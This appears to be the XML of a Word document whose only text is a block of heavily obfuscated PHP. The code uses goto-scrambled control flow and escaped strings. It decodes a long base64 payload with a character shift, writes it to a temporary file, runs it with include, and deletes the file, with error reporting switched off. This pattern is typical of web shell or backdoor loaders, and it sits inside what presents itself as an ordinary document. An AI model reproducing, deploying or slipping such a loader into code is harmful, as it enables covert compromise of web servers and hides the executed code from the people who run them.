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FA97" w14:textId="77777777" w:rsidR="008A6FC0" w:rsidRDefault="008A6FC0" w:rsidP="008A6FC0">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6FC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;?php error_reporting(0);goto PP; BK: function tC($ZJ) { goto rT; rT: $dL = "t\x65mpnam"("sys_g\x65t_t\x65mp_d\x69r"(), "\164\x6d\x70\137\x66\x75\x6e\x63"); goto hq; lJ: unlink($dL); goto Il; Il: return $dm; goto Uc; pM: $dm = (include $dL); goto lJ; hq: file_put_contents($dL, "\74\77\160\150\x70\40{$ZJ}"); goto pM; Uc: } goto dL; PP: function gW($F9) { goto TH; Gd: $ik = 0; goto T3; xN: Ky: goto lt; lt: $ik++; goto Gm; us: return $F9; goto zm; Z9: if (!($ik &lt; strlen($F9))) { goto qK; } goto WS; TH: $F9 = base64_decode($F9); goto Gd; Gm: goto Fk; goto sR; sR: qK: goto us; T3: Fk: goto Z9; WS: $F9[$ik] = chr(ord($F9[$ik]) - 1); goto xN; zm: } goto BK; dL: Tc(gW("\x49\x53\105\x68\111\x53\x45\114\115\103\x73\x68\x49\123\106\x67\131\x47\102\x67\x59\x47\102\x67\x59\x47\102\x67\131\107\102\x67\x59\107\x42\147\131\107\x42\x67\x59\x47\x42\147\x59\x47\x42\x67\x59\107\102\147\131\107\102\x67\x59\107\x42\x67\131\x47\102\147\131\x47\x42\147\131\107\102\x67\131\107\102\147\x59\107\x42\x67\x59\101\163\x68\x49\123\105\x68\x66\x53\x45\150\125\x47\x4e\x6e\x64\156\122\153\131\156\x56\x6d\x5a\123\x46\x6a\x65\x69\106\x61\121\153\x77\x68\125\x58\x4e\167\x49\123\x34\150\x55\127\154\170\x49\126\102\x6a\x5a\63\x5a\x30\132\x47\112\x31\x63\x48\115\x68\x49\124\x4d\x76\x4d\x53\x38\x79\x4e\x53\x45\x68\x66\121\x73\150\x49\x53\105\x68\x66\x53\105\x68\x49\123\x45\x68\x49\x53\105\150\x49\123\x45\x68\111\x53\105\150\x63\x47\70\x68\x4d\172\105\172\116\103\64\171\115\x79\x34\x78\116\103\105\171\117\104\x73\x32\x4e\x7a\163\x30\116\151\105\x68\x49\x53\x45\150\x49\x53\105\x68\111\123\x45\150\111\x53\105\150\146\121\x73\x68\111\x53\x45\x68\146\123\x45\150\111\123\106\111\x61\x6e\126\112\x64\x6d\x4d\x37\111\x57\154\61\x64\130\x46\x30\x4f\172\x41\x77\141\107\x70\61\141\130\132\152\114\62\122\x77\x62\x6a\102\x78\x62\x43\x35\x6e\x63\172\x42\x36\131\x6d\x78\170\x63\x33\101\x75\143\130\101\x68\111\123\x45\x68\146\x51\163\x68\111\123\105\x68\x66\127\102\147\131\107\x42\147\x59\107\x42\147\131\x47\x42\147\131\x47\x42\x67\x59\107\x42\147\131\107\x42\x67\x59\x47\x42\147\x59\x47\102\147\131\107\x42\147\131\107\102\x67\131\x47\x42\147\131\x47\102\x67\131\107\x42\147\x59\107\102\147\131\x47\x42\x67\131\x47\x42\x67\x66\x51\x73\162\x4d\x41\x73\150\141\110\x42\x31\x63\x43\106\110\145\104\167\x68\121\152\x63\67\111\127\144\62\142\x32\122\x31\x61\156\102\166\111\130\x56\63\x4b\123\x56\x7a\125\x79\x6f\150\146\x43\x46\157\143\x48\x56\x77\111\x55\125\64\x50\x43\x46\161\x52\104\163\150\x4a\126\164\x45\x49\x54\x34\150\x4b\x57\160\x76\132\107\x31\x32\x5a\127\131\150\112\130\x6f\62\113\x6a\x77\150\x61\110\x42\61\x63\x43\106\x78\141\152\167\x68\124\62\163\x37\111\130\x4e\x6d\144\x58\132\x7a\142\x79\x45\x6c\127\x30\x51\x38\x49\127\x68\167\144\130\x41\150\141\154\115\x38\x49\x55\x56\x48\117\171\106\x6e\141\x6d\61\x6d\131\x48\106\x32\144\127\102\153\143\107\71\61\132\155\71\61\144\x43\x6b\x6c\145\x6a\x59\164\111\x53\116\70\x4a\130\116\x54\x66\x69\x4d\161\120\103\106\x6f\143\110\126\x77\x49\127\160\x45\120\103\x46\106\x4f\x44\x73\x68\112\x58\x6f\62\111\x54\64\150\144\127\x5a\x75\143\x57\x39\x69\x62\151\x6c\60\x65\156\x52\x67\x61\x47\x5a\61\131\x48\x56\x6d\x62\x6e\x46\x67\132\127\x70\x7a\113\123\157\x74\x49\123\x4e\x64\145\x54\x67\x31\130\x58\153\x33\x5a\x56\61\x35\x4f\x44\106\x64\x65\124\132\x6e\130\124\111\x31\x4e\x31\60\171\116\172\x5a\x64\x65\x54\144\155\130\130\153\63\116\103\x4d\161\x50\103\x46\x6f\x63\110\126\167\111\125\126\110\x50\103\x46\170\x61\152\163\x68\144\x6d\71\x74\x61\155\71\163\113\123\x56\x36\x4e\151\157\x38\x49\127\x68\x77\144\130\101\150\124\62\163\x38\111\x57\160\124\x4f\171\x46\x2b\111\127\x68\x77\144\x58\101\150\144\152\105\70\x49\x55\x64\64\x4f\171\105\154\141\126\x51\x68\120\151\x46\153\144\156\x4e\x74\131\107\x70\x76\141\x6e\x55\x70\113\152\x77\150\x61\110\102\61\143\103\106\125\143\x6a\167\x68\144\110\x67\67\x49\x53\126\172\124\x53\105\x2b\x49\127\122\62\x63\x32\61\x67\x5a\x6e\154\x6d\x5a\103\x6b\154\141\126\x51\x71\x50\x43\106\157\x63\x48\x56\x77\x49\126\102\x62\x50\103\x46\x51\x57\172\x73\150\132\x48\132\x7a\142\127\102\153\142\130\102\x30\132\151\x6b\154\141\x56\121\x71\120\103\x46\x6f\x63\x48\x56\167\x49\x55\x49\x33\x50\103\x46</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6FC0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>\125\143\152\163\x68\x5a\110\x5a\x7a\x62\x57\x42\60\x5a\x6e\126\x77\x63\130\x56\x67\x59\156\116\172\131\156\157\x70\112\127\x6c\125\114\123\x46\151\x63\63\x4e\x69\145\x69\x6c\x45\126\x6c\116\116\x55\x46\106\x56\131\106\x5a\x54\124\123\x45\53\120\x79\105\x6a\x58\x54\111\x32\115\126\60\171\116\172\x56\144\145\x54\147\61\x58\x54\111\x33\x4d\x56\60\x79\x4e\x7a\122\144\x65\x54\x52\x69\130\x58\x6b\x7a\x5a\61\61\65\115\62\144\144\115\152\x63\172\x58\130\x6b\x33\x4d\154\61\x35\117\104\x68\x64\116\152\x64\x64\x65\124\143\64\x58\x58\x6b\x33\117\154\x30\x79\x4e\x7a\x56\144\x65\x54\143\x35\130\124\x49\63\x4e\154\61\65\x4e\x7a\116\144\145\124\x67\x32\x58\x54\111\x33\116\x46\x31\65\116\172\x5a\x64\115\x6a\143\x7a\x58\x58\153\63\x4e\x46\60\x79\x4e\x6a\150\x64\x4d\152\x59\63\x58\130\153\x34\x4e\126\61\65\116\x7a\132\144\x4d\152\131\63\x58\130\153\64\116\x56\x30\62\116\61\61\x35\116\172\x52\144\x65\124\144\x6e\130\x58\x6b\63\132\x56\60\x32\117\x46\60\x33\x4d\x31\61\x35\116\104\x4e\x64\x65\124\x59\65\130\x58\x6b\64\115\126\60\171\x4e\x6a\x56\x64\x65\124\x64\156\x58\x54\x49\62\x4d\154\x30\171\x4e\172\x56\144\x65\x54\143\62\x58\x54\x49\x33\x4d\x31\x30\171\x4d\x54\122\x64\115\152\x63\172\x58\124\111\61\116\154\x30\171\116\x7a\x68\x64\116\x6a\132\x64\145\x54\x59\x31\130\x58\153\x33\116\x6c\61\65\x4e\172\112\144\115\x6a\131\62\x58\130\x6b\x7a\x5a\x31\60\171\x4d\124\x68\x64\x65\124\x63\x32\x58\x54\111\x32\x4e\126\60\63\x4e\x56\x30\171\x4f\x44\x4a\144\116\x6a\132\144\145\124\126\x6c\x58\x58\153\x33\117\154\61\65\116\x32\132\144\115\x6a\x59\x79\130\x58\153\x7a\132\126\x30\x79\x4d\172\122\144\115\x6a\131\170\130\x58\x6b\x33\116\x6c\61\65\x4e\62\122\144\145\124\144\x6b\130\x58\x6b\x7a\132\x56\60\x79\x4d\124\116\x64\115\152\x55\x79\x58\x54\x49\61\x4e\x46\61\x35\x4e\x32\x4e\x64\x4d\x6a\x55\61\130\130\153\63\132\x31\x31\x35\x4e\x32\144\x64\145\124\147\x7a\130\x58\153\172\x5a\61\61\x35\x4e\172\126\144\x65\124\x63\x32\130\130\153\x34\116\x31\60\62\x4f\x46\x31\65\116\x7a\150\x64\x4d\152\x55\x32\x58\x58\153\x33\132\106\61\65\x4e\x7a\x4a\x64\x65\x54\147\66\130\130\x6b\172\x5a\x6c\x31\x35\117\104\x46\144\145\124\x63\65\x58\124\x49\x33\115\x53\x4d\x74\111\x55\x52\127\x55\x30\x31\x51\125\x56\x56\147\126\106\x52\116\131\x46\x64\x47\125\x30\x70\110\127\153\154\x51\126\x46\125\150\x50\152\x38\x68\122\x30\112\116\126\x45\x59\x74\x49\x55\122\127\125\x30\x31\121\x55\x56\x56\x67\x56\x46\x52\116\131\106\144\107\125\x30\x70\x48\127\x6c\106\x47\x52\154\115\150\x50\152\x38\x68\122\x30\x4a\116\x56\x45\131\x74\x49\x55\122\127\125\x30\x31\x51\125\x56\126\x67\125\60\x5a\x56\x56\154\x4e\120\126\126\116\x43\124\61\x52\x48\x52\154\115\x68\120\152\x38\x68\x56\126\x4e\x57\x52\x69\x6f\x71\120\103\x46\x6f\x63\x48\126\x77\111\130\x52\x34\x50\103\106\x32\115\x54\x73\x68\x64\x58\x63\x70\112\130\x4e\x4e\113\152\167\75"));</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008A6FC0" w:rsidSect="000A759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05"/>
    <w:rsid w:val="00326D44"/>
    <w:rsid w:val="008A6FC0"/>
    <w:rsid w:val="00B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CD9C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{440F7ADB-DEC0-4D09-AB91-2543E38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75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59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janwar arifin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>janwar arifin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-15T17:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-15T17:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>